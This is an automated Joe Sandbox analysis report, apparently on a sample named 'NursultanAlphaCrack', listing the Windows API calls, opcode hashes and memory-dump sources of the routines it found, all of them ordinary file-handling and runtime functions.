                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: I=u
                                                                                        • API String ID: 1269201914-3032091488
                                                                                        • Opcode ID: 2128f4da607879ed5fc0ef2dc7e8ec0365c4c297d859145a14d5839fe27e141c
                                                                                        • Instruction ID: 6986a04a8b2a6e6c94304b8fb6266b76f14516a4ba29b4b15c079f4a5734c43c
                                                                                        • Opcode Fuzzy Hash: 2128f4da607879ed5fc0ef2dc7e8ec0365c4c297d859145a14d5839fe27e141c
                                                                                        • Instruction Fuzzy Hash: 5EA001E63A918ABC710872566E06C3B029DC4D5B66331892FF916C8695AA91784528B1
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: I=u
                                                                                        • API String ID: 1269201914-3032091488
                                                                                        • Opcode ID: 08fffabcfad5f734562d86b93f5106e25cb9d3b6870636c5f4feec5b3dc734f4
                                                                                        • Instruction ID: 6986a04a8b2a6e6c94304b8fb6266b76f14516a4ba29b4b15c079f4a5734c43c
                                                                                        • Opcode Fuzzy Hash: 08fffabcfad5f734562d86b93f5106e25cb9d3b6870636c5f4feec5b3dc734f4
                                                                                        • Instruction Fuzzy Hash: 5EA001E63A918ABC710872566E06C3B029DC4D5B66331892FF916C8695AA91784528B1
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: I=u
                                                                                        • API String ID: 1269201914-3032091488
                                                                                        • Opcode ID: 0b715152a44a30c2aece252b3c6b492866a87ac0c9539688e4bf558d0ade37cd
                                                                                        • Instruction ID: 6986a04a8b2a6e6c94304b8fb6266b76f14516a4ba29b4b15c079f4a5734c43c
                                                                                        • Opcode Fuzzy Hash: 0b715152a44a30c2aece252b3c6b492866a87ac0c9539688e4bf558d0ade37cd
                                                                                        • Instruction Fuzzy Hash: 5EA001E63A918ABC710872566E06C3B029DC4D5B66331892FF916C8695AA91784528B1
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: I=u
                                                                                        • API String ID: 1269201914-3032091488
                                                                                        • Opcode ID: 1e2a012d7e567851308e885c8dbdc9f384528f66551886a30e5b1fa90aa248f5
                                                                                        • Instruction ID: 6986a04a8b2a6e6c94304b8fb6266b76f14516a4ba29b4b15c079f4a5734c43c
                                                                                        • Opcode Fuzzy Hash: 1e2a012d7e567851308e885c8dbdc9f384528f66551886a30e5b1fa90aa248f5
                                                                                        • Instruction Fuzzy Hash: 5EA001E63A918ABC710872566E06C3B029DC4D5B66331892FF916C8695AA91784528B1
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 001DE1E3
                                                                                          • Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
                                                                                          • Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: I=u
                                                                                        • API String ID: 1269201914-3032091488
                                                                                        • Opcode ID: 432d5e753789ef14d819e746107a4f164ff36605f1ec51b09a8bf479e393fc1b
                                                                                        • Instruction ID: 6986a04a8b2a6e6c94304b8fb6266b76f14516a4ba29b4b15c079f4a5734c43c
                                                                                        • Opcode Fuzzy Hash: 432d5e753789ef14d819e746107a4f164ff36605f1ec51b09a8bf479e393fc1b
                                                                                        • Instruction Fuzzy Hash: 5EA001E63A918ABC710872566E06C3B029DC4D5B66331892FF916C8695AA91784528B1
                                                                                        APIs
                                                                                          • Part of subcall function 001EB7BB: GetOEMCP.KERNEL32(00000000,?,?,001EBA44,?), ref: 001EB7E6
                                                                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,001EBA89,?,00000000), ref: 001EBC64
                                                                                        • GetCPInfo.KERNEL32(00000000,001EBA89,?,?,?,001EBA89,?,00000000), ref: 001EBC77
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: CodeInfoPageValid
                                                                                        • String ID:
                                                                                        • API String ID: 546120528-0
                                                                                        • Opcode ID: 785b6bd11419ef20eef1b8e4d4f42225feba33b90c48d5cf28b9339a6a14e741
                                                                                        • Instruction ID: fc70ec80bdb4fcd214303a74115d416f5a03bb0ae964433e945b9450efa93461
                                                                                        • Opcode Fuzzy Hash: 785b6bd11419ef20eef1b8e4d4f42225feba33b90c48d5cf28b9339a6a14e741
                                                                                        • Instruction Fuzzy Hash: B451647090CA859EDB24CFB2C8C16BFBBE5FF51308F28406ED0968B261D7359946CB90
                                                                                        APIs
                                                                                        • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,001C9A50,?,?,00000000,?,?,001C8CBC,?), ref: 001C9BAB
                                                                                        • GetLastError.KERNEL32(?,00000000,001C8411,-00009570,00000000,000007F3), ref: 001C9BB6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastPointer
                                                                                        • String ID:
                                                                                        • API String ID: 2976181284-0
                                                                                        • Opcode ID: 760634f6dac82d30cc281159c7d77f27f24d6b89d0b07bb706c9347eec352903
                                                                                        • Instruction ID: 6426c4d14b34f7e81985568fda437263233a7976897b3dae07bdbe94af079ba1
                                                                                        • Opcode Fuzzy Hash: 760634f6dac82d30cc281159c7d77f27f24d6b89d0b07bb706c9347eec352903
                                                                                        • Instruction Fuzzy Hash: AE41CE71604381AFDB28DF15E588F6AB7E5FFF4320F158A2DE89183260D770ED448A91
                                                                                        APIs
                                                                                          • Part of subcall function 001E97E5: GetLastError.KERNEL32(?,00201030,001E4674,00201030,?,?,001E3F73,00000050,?,00201030,00000200), ref: 001E97E9
                                                                                          • Part of subcall function 001E97E5: _free.LIBCMT ref: 001E981C
                                                                                          • Part of subcall function 001E97E5: SetLastError.KERNEL32(00000000,?,00201030,00000200), ref: 001E985D
                                                                                          • Part of subcall function 001E97E5: _abort.LIBCMT ref: 001E9863
                                                                                          • Part of subcall function 001EBB4E: _abort.LIBCMT ref: 001EBB80
                                                                                          • Part of subcall function 001EBB4E: _free.LIBCMT ref: 001EBBB4
                                                                                          • Part of subcall function 001EB7BB: GetOEMCP.KERNEL32(00000000,?,?,001EBA44,?), ref: 001EB7E6
                                                                                        • _free.LIBCMT ref: 001EBA9F
                                                                                        • _free.LIBCMT ref: 001EBAD5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorLast_abort
                                                                                        • String ID:
                                                                                        • API String ID: 2991157371-0
                                                                                        • Opcode ID: 75c1309dd67c9b1165a98b0db238abf6e1911676fd8ece9614db9e532e13bf9b
                                                                                        • Instruction ID: 8305d8b05e1fd6569763f54f830695592f19d3da5b6e2db9b7a6413e709dfd32
                                                                                        • Opcode Fuzzy Hash: 75c1309dd67c9b1165a98b0db238abf6e1911676fd8ece9614db9e532e13bf9b
                                                                                        • Instruction Fuzzy Hash: 9F314231908589AFDF10DF96E4C1BAE77F1EF90324F2540A9F5049B2A2EB315D40DB50
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 001C1E55
                                                                                          • Part of subcall function 001C3BBA: __EH_prolog.LIBCMT ref: 001C3BBF
                                                                                        • _wcslen.LIBCMT ref: 001C1EFD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: H_prolog$_wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 2838827086-0
                                                                                        • Opcode ID: 94bc45fd33298cde52d03b9cf39dd8791797a73b08174fde1a9a1633c785d6a4
                                                                                        • Instruction ID: f1c87f5577f9528ae8ca204b156485749a52544df8cc2cda50e79ff7d5d237e3
                                                                                        • Opcode Fuzzy Hash: 94bc45fd33298cde52d03b9cf39dd8791797a73b08174fde1a9a1633c785d6a4
                                                                                        • Instruction Fuzzy Hash: 54312D71944209AFCF15EF99C945EEEBBF5AF69300F10005EF845A7252C7369E15CB60
                                                                                        APIs
                                                                                        • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,001C73BC,?,?,?,00000000), ref: 001C9DBC
                                                                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 001C9E70
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$BuffersFlushTime
                                                                                        • String ID:
                                                                                        • API String ID: 1392018926-0
                                                                                        • Opcode ID: cae4c05f560735d5ff1f5f17ab6ea3820313386bfd41495e7204de615a5fa0ff
                                                                                        • Instruction ID: 728800343bb50abf35227b59aa08dd73e554a9be7969baf542aa3372aed55ae7
                                                                                        • Opcode Fuzzy Hash: cae4c05f560735d5ff1f5f17ab6ea3820313386bfd41495e7204de615a5fa0ff
                                                                                        • Instruction Fuzzy Hash: EB21CE31248285ABC714DF64C899FBABBE4AF65304F08491DF8C687541D329E90CDB62
                                                                                        APIs
                                                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,001C9F27,?,?,001C771A), ref: 001C96E6
                                                                                        • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,001C9F27,?,?,001C771A), ref: 001C9716
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: 77a7dc1cb0ca005367be67c184a1e3ec51c44486517e3226e85fe7fbdb3793d5
                                                                                        • Instruction ID: 4afea8462d873f0fefb4d98eff8b37372a7474fb035befe699ec374725b1cd35
                                                                                        • Opcode Fuzzy Hash: 77a7dc1cb0ca005367be67c184a1e3ec51c44486517e3226e85fe7fbdb3793d5
                                                                                        • Instruction Fuzzy Hash: 6921BDB15043546EE3308A65CC89FF7B7DCEB69324F000A1DFA95C66D1C774E8848A71
                                                                                        APIs
                                                                                        • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 001C9EC7
                                                                                        • GetLastError.KERNEL32 ref: 001C9ED4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastPointer
                                                                                        • String ID:
                                                                                        • API String ID: 2976181284-0
                                                                                        • Opcode ID: 48ddc44f966289685eed8ff53e27f95280867a4e811c0e295c79006681bff274
                                                                                        • Instruction ID: 11e2c85c461254789e7b3288f3e06d53d48459a6b477a5ec87de0dd3eeeee46e
                                                                                        • Opcode Fuzzy Hash: 48ddc44f966289685eed8ff53e27f95280867a4e811c0e295c79006681bff274
                                                                                        • Instruction Fuzzy Hash: 2A11A571600700ABD724C668C849FB6B7E9AB75360F504A2DE563D2AD0D774ED45C760
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 001E8E75
                                                                                          • Part of subcall function 001E8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,001ECA2C,00000000,?,001E6CBE,?,00000008,?,001E91E0,?,?,?), ref: 001E8E38
                                                                                        • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00201098,001C17CE,?,?,00000007,?,?,?,001C13D6,?,00000000), ref: 001E8EB1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocAllocate_free
                                                                                        • String ID:
                                                                                        • API String ID: 2447670028-0
                                                                                        • Opcode ID: 8d71d65e461d3ad4ad6995382a350155624733d1566e7ce720a3be42af4868c1
                                                                                        • Instruction ID: bcc7acef6af92756eacf9892338004beb70b63fdbc0747a8929a12b3f00ccd54
                                                                                        • Opcode Fuzzy Hash: 8d71d65e461d3ad4ad6995382a350155624733d1566e7ce720a3be42af4868c1
                                                                                        • Instruction Fuzzy Hash: E9F0F632211E827ADB252A67AC05FAF77588FD1B70F2D0125F81CA7191DF71CD0091A0
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(?,?), ref: 001D10AB
                                                                                        • GetProcessAffinityMask.KERNEL32(00000000), ref: 001D10B2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$AffinityCurrentMask
                                                                                        • String ID:
                                                                                        • API String ID: 1231390398-0
                                                                                        • Opcode ID: 9fb4ed2f113dbbde6e2b06cc9b32e7e410205b0d038af0ffbc542158d42e98c1
                                                                                        • Instruction ID: 615e777f5a0964024a07eb32682f738d569bb2055511a21762b6f115667a0fea
                                                                                        • Opcode Fuzzy Hash: 9fb4ed2f113dbbde6e2b06cc9b32e7e410205b0d038af0ffbc542158d42e98c1
                                                                                        • Instruction Fuzzy Hash: A7E09272B00245B78F099BA49C058BB72DEEA442443104177F413D3601FB30DE818660
                                                                                        APIs
                                                                                        • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,001CA325,?,?,?,001CA175,?,00000001,00000000,?,?), ref: 001CA501
                                                                                          • Part of subcall function 001CBB03: _wcslen.LIBCMT ref: 001CBB27
                                                                                        • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,001CA325,?,?,?,001CA175,?,00000001,00000000,?,?), ref: 001CA532
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile$_wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 2673547680-0
                                                                                        • Opcode ID: ba58171f24a2f065a77bb3f8fbccf3c52f9a6ade771ec46472d16a6c45ee1468
                                                                                        • Instruction ID: 25587e2afae0330d88cd21a9ef351df18483de2576c1e5a6c906ea919a4feeeb
                                                                                        • Opcode Fuzzy Hash: ba58171f24a2f065a77bb3f8fbccf3c52f9a6ade771ec46472d16a6c45ee1468
                                                                                        • Instruction Fuzzy Hash: C6F0653524010D7BDF025F60DC45FEA376CAF24785F448055B945D5160DB71DED4DB50
                                                                                        APIs
                                                                                        • DeleteFileW.KERNELBASE(000000FF,?,?,001C977F,?,?,001C95CF,?,?,?,?,?,001F2641,000000FF), ref: 001CA1F1
                                                                                          • Part of subcall function 001CBB03: _wcslen.LIBCMT ref: 001CBB27
                                                                                        • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,001C977F,?,?,001C95CF,?,?,?,?,?,001F2641), ref: 001CA21F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
